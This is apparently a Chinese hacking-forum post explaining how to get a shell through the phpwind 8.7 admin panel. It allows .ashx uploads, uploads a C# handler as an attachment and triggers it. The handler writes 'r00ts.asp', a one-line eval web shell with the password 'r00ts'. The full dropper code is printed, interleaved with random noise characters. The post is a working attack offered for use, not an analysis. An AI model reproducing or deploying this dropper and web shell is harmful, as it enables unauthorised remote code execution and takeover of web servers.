phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
' A# `9 I9 J+ V" r
: u+ M, |) q& X4 y4 j. w5 i$ a: J发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

1 [. U; V' X; N% b然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
' S4 _  k! g' R' Y) {
下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
using System;
' {! V( r4 o* musing System.Web;
using System.IO;
& {9 W# h* [$ C4 Fpublic class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
; i/ Z0 C3 r8 F- [" s, M% h9 |2 MStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
file1.Close();
}
& i" I3 b% T' I6 Epublic bool IsReusable {
2 k6 H% Y) F1 }" Q1 Iget {
+ J. a" e9 i# O# y( l! Zreturn false;
}
}
}
* j. P( O3 N" v